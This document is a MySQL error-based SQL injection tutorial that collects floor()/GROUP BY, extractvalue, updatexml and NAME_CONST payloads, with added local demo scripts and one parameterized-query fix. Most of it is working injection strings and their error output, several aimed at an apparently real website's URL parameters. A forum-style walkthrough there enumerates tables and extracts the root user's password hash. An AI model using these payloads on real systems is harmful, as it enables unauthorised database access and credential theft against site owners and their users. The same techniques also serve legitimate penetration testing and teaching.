1. Error-based injection via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)))

Example:

First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is leaked inside the duplicate key (the trailing 1 is the floor(rand(0)*2) value). To extract other data, replace version() with the subquery whose result you want.

For example, to retrieve the administrator's password:

Method 1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id = 1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Both methods need at least three rows in the table being grouped: information_schema.tables always has them, and Method 2 supplies its own three-row UNION so it does not depend on any table.

2. ExtractValue

Test payload:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)))

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test payload:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'

Both XPath functions echo the malformed expression in the error, but the message shows at most 32 characters, so longer values have to be read in pieces with substr().
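The three error channels above share one demo schema in the following added example, which is not part of the original post. The errdemo database, the article and admin tables and their rows are constructed here, and the server is assumed to be a MySQL instance you control. Beyond the post it shows why the floor() trick needs three rows, how to page past the 32-character cap of the XPath error text, and the parameterized form of the query that closes the hole.

```sql
-- Added example, not from the original post. Assumes a MySQL server on which you may
-- create a scratch schema; errdemo, article, admin and their rows are constructed for it.
CREATE DATABASE IF NOT EXISTS errdemo;
USE errdemo;
CREATE TABLE article (id INT PRIMARY KEY, title VARCHAR(50), content TEXT);
CREATE TABLE admin   (id INT PRIMARY KEY, user VARCHAR(50), pass VARCHAR(100));
INSERT INTO article VALUES (1, 'test', 'do it');
INSERT INTO admin   VALUES (1, 'admin',  'admin888'),
                           (2, 'editor', 'a-secret-longer-than-thirty-two-characters!');

-- 1. floor(rand(0)*2) with GROUP BY.
-- rand(0) is seeded, so floor(rand(0)*2) yields a fixed sequence that begins 0, 1, 1.
-- GROUP BY computes the key once to look it up in its temporary table and again when it
-- inserts the row: row 1 looks up 0, inserts as ...1; row 2 looks up 1, found; row 3 looks
-- up 0, not found, inserts as ...1 again, so the server raises ERROR 1062 (Duplicate entry)
-- and the duplicated key carries the data. That is why at least three source rows are needed.
SELECT * FROM article WHERE id = 1
  AND (SELECT 1 FROM (SELECT count(*),
                             concat((SELECT pass FROM admin LIMIT 0,1), floor(rand(0)*2)) x
                      FROM information_schema.tables GROUP BY x) a);
-- Walk the admin table by changing the LIMIT offset (LIMIT 1,1 is the second row).

-- 2. extractvalue(): the XPath parser rejects the expression and quotes it back.
-- 0x7e is '~'; like the post's 0x5c backslash it is illegal at the start of an XPath
-- expression, so the whole concatenated value is reported.
SELECT * FROM article WHERE id = 1
  AND extractvalue(1, concat(0x7e, (SELECT pass FROM admin LIMIT 0,1)));

-- 3. updatexml(): same error channel. The quoted text is capped at 32 characters
-- ('~' plus 31 of the value), so long values are read in 31-byte windows with substr().
SELECT * FROM article WHERE id = 1
  AND updatexml(1, concat(0x7e, substr((SELECT pass FROM admin LIMIT 1,1), 1, 31)), 1);
SELECT * FROM article WHERE id = 1
  AND updatexml(1, concat(0x7e, substr((SELECT pass FROM admin LIMIT 1,1), 32, 31)), 1);

-- Hardened form: bind id as a parameter. The same payload is now a string compared
-- against id (MySQL casts it to a number with a warning); nothing in it is parsed as SQL,
-- so no XPath error and no leak.
PREPARE stmt FROM 'SELECT * FROM article WHERE id = ?';
SET @id = '1 AND extractvalue(1, concat(0x7e, (SELECT pass FROM admin LIMIT 0,1)))';
EXECUTE stmt USING @id;
DEALLOCATE PREPARE stmt;
```

Run it in the mysql client statement by statement: the three injected SELECTs each fail with the error the post shows, the value sitting in the duplicated key or the quoted XPath text, while the prepared statement returns the article row and nothing else.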
More collected payloads:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
MySQL error-based injection technique for newer versions: injection using NAME_CONST

It's been a while since I've made an SQL injection tutorial, so I thought I should make a new one using the NAME_CONST method. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Related information
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything older than that. The documentation also says the arguments should be constants; on builds that enforce this, passing version() or a subquery as the name fails with "Incorrect arguments to NAME_CONST" instead of producing the duplicate-column error, so the technique only works on servers that skip that check.
Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

|------|
| TEST |
|------|
| 1    |
|------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = the MySQL system variable (or a function such as version()) whose value you want; it becomes the column name, and the two identical names collide.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST when trying to extract data. Nothing was wrong with my syntax; it just wouldn't work there. Luckily, it works here, so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column '1' error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'
Now let's get the tables out of this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

The table and schema names are passed as hex literals so the URL needs no quote characters: 0x6d7973716c is 'mysql' and 0x75736572 is 'user'.

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'
Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

0x207e20 is ' ~ ', so concat_ws joins the two columns with a visible separator.

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
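The following added example is not the tutorial author's code or the collected payloads; it ties together the two NAME_CONST spellings used on this page (the "as x" derived table from the tutorial and the join form from the collected URLs) and shows why NAME_CONST is needed at all. It assumes a MySQL 5.0.x build that still accepts non-constant NAME_CONST arguments; the errdemo schema and its admin table are constructed for the demo.

```sql
-- Added example, not from the tutorial. Assumes a MySQL 5.0.x build that accepts
-- non-constant NAME_CONST() arguments; errdemo and admin are constructed for the demo.
CREATE DATABASE IF NOT EXISTS errdemo;
USE errdemo;
CREATE TABLE IF NOT EXISTS admin (id INT PRIMARY KEY, user VARCHAR(50), pass VARCHAR(100));
INSERT IGNORE INTO admin VALUES (1, 'admin', 'admin888');

-- Why NAME_CONST is needed: a derived-table column is named after its expression text,
-- so two version() columns collide on the literal name 'version()' and leak nothing.
SELECT * FROM (SELECT version(), version()) AS x;

-- NAME_CONST() names the column after its first argument's VALUE, so the same duplicate
-- column error now carries the data. The two spellings used on this page are equivalent:
SELECT 1 FROM (SELECT NAME_CONST(version(), 1), NAME_CONST(version(), 1)) AS x;
SELECT 1 FROM (SELECT * FROM (SELECT NAME_CONST(version(), 0)) a
               JOIN (SELECT NAME_CONST(version(), 0)) b) c;

-- Extraction: the name may be any scalar subquery; LIMIT n,1 walks the rows, and
-- identifiers go in as hex literals so the URL needs no quotes (0x75736572 = hex('user')).
SELECT 1 FROM (SELECT
    NAME_CONST((SELECT column_name FROM information_schema.columns
                WHERE table_schema = 0x6d7973716c AND table_name = 0x75736572 LIMIT 0,1), 1),
    NAME_CONST((SELECT column_name FROM information_schema.columns
                WHERE table_schema = 0x6d7973716c AND table_name = 0x75736572 LIMIT 0,1), 1)) AS x;

-- Two columns in one read: concat_ws(0x207e20, ...) joins them with ' ~ '.
SELECT 1 FROM (SELECT
    NAME_CONST((SELECT concat_ws(0x207e20, user, pass) FROM admin LIMIT 0,1), 1),
    NAME_CONST((SELECT concat_ws(0x207e20, user, pass) FROM admin LIMIT 0,1), 1)) AS x;

-- Caveat: a server that enforces the documented "arguments should be constants" rule
-- rejects every NAME_CONST query above with ER_WRONG_ARGUMENTS ("Incorrect arguments to
-- NAME_CONST") before any column-name collision happens. Those are the "invalid calls"
-- the tutorial mentions; on such builds fall back to the floor()/GROUP BY or XPath
-- error channels from the first part of this page, which do not use NAME_CONST.
```

The first SELECT is the control: it fails too, but with the useless name 'version()', which is exactly what the NAME_CONST wrapper fixes. Every later statement fails with the extracted value in the duplicate-column message, or with the constant-argument error on servers that enforce the rule.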